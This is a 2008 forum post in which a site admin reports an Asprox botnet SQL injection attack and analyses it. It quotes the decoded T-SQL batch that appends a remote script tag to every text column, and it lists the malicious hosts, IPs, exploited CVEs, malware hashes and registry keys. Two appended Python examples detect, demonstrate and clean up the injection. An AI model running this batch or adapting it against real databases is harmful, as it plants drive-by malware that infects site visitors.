Website Upgrade / Security Fixes

Author: Mr. Bandnut (Admin Group)
Joined: Dec 24 2000
Points: 689
Posted: May 20 2008 at 8:37am

Sorry for any issues you may have had with this web site in the last few days. I have been battling an automated bot trying to hack the BandNut database. It was injecting malicious JavaScript code into the database tables, requiring me to restore the database from a backup. Yes, some data was lost, so you may need to re-add a post or an event or two.

I spent a few days last week upgrading the forums in the hope it would be more secure. But I later found out that the SQL injection was getting through on pages I had created. So for 10 hours on Sunday I read through each page of code on BandNut and tightened the security for each page where needed. I do feel now that this site is safe from this and similar attacks.

The code that was inserted into the site executed some JavaScript from another site when anyone visited BandNut. My personal computer was not infected by this, but I keep my software up-to-date and run regular scans.

If you visited BandNut during May 13th - May 18th I would recommend checking your computer for spyware, running an anti-virus scan, and ensuring your web browser is up-to-date. All of which you should do regularly anyway. It would probably be a good idea to also upgrade any media players or other software that connects to the web.

After a bit of searching it looks like over 30,000 web sites have been hit with this!!

Here is the low down on the attack if you want the technical side:

Fast-Fluxing SQL injection attacks executed from the Asprox botnet

SQL Injection Attack:

DECLARE @S VARCHAR(4000);SET @S=CAST(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 AS VARCHAR(4000));EXEC(@S);--


Decodes to:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''script src=http: //www[dot]banner82[dot]com/b.js script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

The user-agent for the injection was: Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1; .NET CLR 2.0.50727)

Banner82.com Domain
As reported by Danchev, the domain uses fast-flux technology (double-flux) with a rotating pool of proxy peer and DNS IP addresses. A small sample during analysis revealed:

24.126.130.229
67.167.252.180
69.247.201.61
71.81.34.118
74.129.121.181
75.118.8.92
78.92.76.30
89.170.16.252
99.151.145.10
99.254.31.140

Banner82.com Site
The b.js file may redirect to malicious code at a variety of locations. A sample analysis revealed the following.

injected script: http: //www[dot]banner82[dot]com/b.js

b.js returned an iframe redirect to: http: //banner82[dot]com/cgi-bin/index.cgi?ad

http: //banner82[dot]com/cgi-bin/index.cgi?ad returned a location redirect to: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox

http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox returned two layers of obfuscated code (callee.toString() + location.href)

The result is a script redirect to http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258007e11f339060000000002e547d1afff02656e2d75730000000000

(the string characters vary with each connection)

Two more layers of obfuscated code (callee.toString() + location.href) reveal Neosploit generated exploit code targeted at the following vulnerabilities:

MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)
AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability (CVE-2006-5820)
GOM Player GOM Manager ActiveX Control Buffer Overflow (CVE-2007-5779)
CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability (CVE-2008-1472)
Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability (CVE-2007-0059)
Heap-based buffer overflow in DirectAnimation.PathControl COM object (CVE-2006-4446)

The payload was a request for the binary file: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258027e11f339060000000002e547d1e60002040900000000020

Malware Analysis:
The payload was saved as "index"

Filename: (index.exe) – long string of characters
MD5: 60b9fbb8ba14171cd5d3d1fd86ddd564
Size: 48.0 KB (49,152 bytes)

The malware made the following connections to retrieve common.bin (spam instructions) and cmdexe.bin (the SQL injection tool msscntr32.exe):

POST /forum.php HTTP/1.1
Host: 66[dot]199[dot]241[dot]98

POST /forum_asp.php HTTP/1.1
Host: 66[dot]197[dot]168[dot]5

The "index" malware searches for installations of CuteFTP and WS_FTP. The following files were created:

C:\WINDOWS\System32\aspimgr.exe Trojan.Asprox (Symantec)
C:\WINDOWS\s32.txt
C:\WINDOWS\System32\msscntr32.exe

Filename: aspimgr.exe
MD5: bb0c22f33cbf8be8a264e96ef6895ce4
Size: 72.0 KB (73,728 bytes)

Filename: msscntr32.exe
MD5: 30afb898ba27e925f41eab9e68b62833
Size: 20.0 KB (20,480 bytes)

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {056B8C51-1B27-4D61-81CA-66EA278842B7}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "DisplayName"
Type: REG_SZ
Data: Microsoft Security Center Extension
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\msscntr32.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_MSSCENTER\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00


The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to "ns.uk2.net" on port 53 (IP)
* Connects to "www.yahoo.com" on port 80 (IP)
* Connects to "www.web.de" on port 80 (IP)

The Asprox malware generated phishing emails related to "NatWest OnLine Banking"


 

  

Edited by Mr. Bandnut - May 20 2008 at 8:38am
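Added example, not code from the original post or from the Danchev write-up it quotes: a Python scanner that finds the hex literal inside a CAST(0x... AS VARCHAR(4000)) ... EXEC(@S) batch in IIS W3C log lines, decodes it, and reports the script src it tries to append. The log lines, the T-SQL batch and the host example.invalid are constructed here (the real hex literal is not reproduced on the page); the user-agent is the one the post lists. It also accepts the NVARCHAR (UTF-16LE hex) spelling, which the page does not show.

```python
"""Decode and flag Asprox-style CAST(0x...) SQL injection batches in IIS W3C log lines."""
import re
from urllib.parse import unquote_plus

# The injected batch hides its real T-SQL as a hex literal inside
# CAST(0x... AS VARCHAR(4000)) and hands it to EXEC(). Later waves of the same campaign
# used NVARCHAR (UTF-16LE hex), so both spellings are accepted here.
CAST_HEX = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)\s*\(\s*\d+\s*\)\s*\)", re.IGNORECASE
)
# The src of any <script src=...> the decoded batch appends to table columns. The leading
# '<' is optional because forum software often strips the angle brackets when quoting.
SCRIPT_SRC = re.compile(r"<?script\s+src\s*=\s*['\"]?([^\s'\"<>]+)", re.IGNORECASE)


def decode_cast_hex(hex_digits: str, kind: str) -> str:
    """Turn the hex literal from CAST(0x.. AS [N]VARCHAR(..)) back into the T-SQL it hides."""
    raw = bytes.fromhex(hex_digits)
    if kind.upper() == "NVARCHAR":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def scan_log_line(line: str) -> list:
    """One finding per hex-encoded CAST/EXEC batch in a single IIS W3C log line."""
    # IIS logs the query string still percent-encoded; decode before matching.
    text = unquote_plus(line)
    findings = []
    for m in CAST_HEX.finditer(text):
        decoded = decode_cast_hex(m.group(1), m.group(2))
        findings.append({
            "encoding": m.group(2).upper(),
            "decoded": decoded,
            "script_src": SCRIPT_SRC.findall(decoded),
            # The page's batch walks sysobjects/syscolumns to reach every text column.
            "walks_catalog": "sysobjects" in decoded.lower(),
        })
    return findings


def scan_log(lines) -> list:
    """Scan many lines; each finding carries the 1-based number of the line it came from."""
    results = []
    for n, line in enumerate(lines, 1):
        for finding in scan_log_line(line):
            finding["line"] = n
            results.append(finding)
    return results


# --- Constructed sample data (not from the original post) ---------------------------------
# Stand-in for the decoded batch quoted on the page, with the hostile host replaced by
# example.invalid so this file stays harmless. The real hex literal is not reproduced.
SAMPLE_BATCH = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' "
    "AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))"
    "+''<script src=http://www.example.invalid/b.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
HEX_VARCHAR = SAMPLE_BATCH.encode("latin-1").hex().upper()
HEX_NVARCHAR = SAMPLE_BATCH.encode("utf-16-le").hex().upper()
# User-agent from the post, written the way IIS logs it (spaces as '+').
UA = "Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727)"

SAMPLE_LOG = [
    "2008-05-15 03:12:40 10.0.0.5 GET /events.asp id=17 80 - 198.51.100.9 " + UA + " 200",
    "2008-05-15 03:12:44 10.0.0.5 GET /events.asp id=17;DECLARE%20@S%20VARCHAR(4000);SET%20@S="
    "CAST(0x" + HEX_VARCHAR + "%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 198.51.100.9 " + UA + " 200",
    "2008-05-15 03:13:01 10.0.0.5 GET /forum.asp t=3;DECLARE%20@S%20NVARCHAR(4000);SET%20@S="
    "CAST(0x" + HEX_NVARCHAR + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 198.51.100.9 " + UA + " 200",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['encoding']} batch appends {f['script_src']}, "
              f"catalog walk={f['walks_catalog']}")
```

Run it against a real IIS log with `scan_log(open(path, encoding="latin-1"))`; matching on the decoded hex rather than on the literal `DECLARE @S` keeps it working when the bot varies whitespace, case or encoding of the wrapper, and the decoded src tells you which host to block and which string to search for in the database.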
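Added example, not BandNut's code and not from the post: the pre-fix query-building pattern the author describes (a query-string value concatenated into the SQL text), the parameterized replacement, and a cleanup pass for text columns that already carry the appended tag. sqlite3 stands in for SQL Server and executescript() for an ADO call that runs the stacked batch; the table, its rows, the payload and the host example.invalid are all constructed. The cleanup walks the catalog for the same reason the attacker's batch did: the page's UPDATE hit every text column of every user table, not just one.

```python
"""The string-built query pattern the post describes, its parameterized replacement, and a
cleanup pass for text columns that already carry the appended tag.

sqlite3 stands in for SQL Server; executescript() plays the part of an ADO call that runs
the whole batch the attacker stacked onto the query-string value."""
import sqlite3

# Constructed stand-ins (hostile host replaced by example.invalid). SQLite concatenates
# with ||, where the page's T-SQL used +.
INJECTED_TAG = "<script src=http://www.example.invalid/b.js></script>"
PAYLOAD = "17; UPDATE events SET body = RTRIM(body) || '" + INJECTED_TAG + "'"


def make_db() -> sqlite3.Connection:
    """In-memory events table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO events (id, title, body) VALUES (?, ?, ?)",
        [(17, "Friday show", "Doors at 8pm."), (18, "Rehearsal", "Bring the drum kit.")],
    )
    conn.commit()
    return conn


def event_vulnerable(conn: sqlite3.Connection, event_id: str) -> int:
    """Pre-fix pattern: the query-string value is pasted into the SQL text and the driver
    runs whatever batch results. Returns how many rows the batch changed (0 for honest input)."""
    before = conn.total_changes
    conn.executescript("SELECT id, title, body FROM events WHERE id=" + event_id)
    return conn.total_changes - before


def event_safe(conn: sqlite3.Connection, event_id: str) -> list:
    """Post-fix pattern: check the type, then bind the value; it is never parsed as SQL."""
    try:
        ident = int(event_id)
    except ValueError:
        raise ValueError("event id must be an integer") from None
    return conn.execute(
        "SELECT id, title, body FROM events WHERE id=?", (ident,)
    ).fetchall()


def tainted_rows(conn: sqlite3.Connection) -> list:
    """Ids of events whose body now carries a <script src= tag."""
    rows = conn.execute(
        "SELECT id FROM events WHERE body LIKE '%<script src=%' ORDER BY id"
    ).fetchall()
    return [r[0] for r in rows]


def strip_injected_tag(conn: sqlite3.Connection, tag: str) -> int:
    """Walk every user table's text columns (the same catalog walk the attacker's batch did,
    here via sqlite_master and PRAGMA table_info) and cut the tag out. Returns rows touched.
    Catalog names are interpolated as quoted identifiers; the tag itself is bound."""
    touched = 0
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'"
    ).fetchall()]
    for table in tables:
        for _cid, name, coltype, *_ in conn.execute(f'PRAGMA table_info("{table}")').fetchall():
            kind = (coltype or "").upper()
            if "CHAR" not in kind and "TEXT" not in kind:
                continue
            cur = conn.execute(
                f'UPDATE "{table}" SET "{name}" = REPLACE("{name}", ?, ?) WHERE instr("{name}", ?) > 0',
                (tag, "", tag),
            )
            touched += cur.rowcount
    conn.commit()
    return touched


if __name__ == "__main__":
    conn = make_db()
    print("rows changed by stacked batch:", event_vulnerable(conn, PAYLOAD))
    print("tainted after injection:", tainted_rows(conn))
    print("rows cleaned:", strip_injected_tag(conn, INJECTED_TAG))
    print("tainted after cleanup:", tainted_rows(conn))
    print("safe lookup:", event_safe(conn, "17"))
    try:
        event_safe(conn, PAYLOAD)
    except ValueError as err:
        print("safe lookup rejected the payload:", err)
```

The cleanup only removes a tag whose text you know exactly, so take it from the decoded batch or from a tainted row first; restoring from a backup, as the author did, is the alternative when you cannot be sure what else the batch changed. Binding the value with `?` is what closes the hole; the `int()` check on top just gives a clear error instead of an empty result.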
Author: ChowderMonkey (Band Member)
Joined: Jan 29 2006
Band: Chowder Monkey
Points: 1268
Posted: May 21 2008 at 5:39am
Glad you got it all worked out man. Being a fellow webmaster, I'm feeling your pain. Nothing like a ferked up database to wreck a week or so of your life!
Baby, it's not the 2.5 inches... It's the 200 pounds behind it.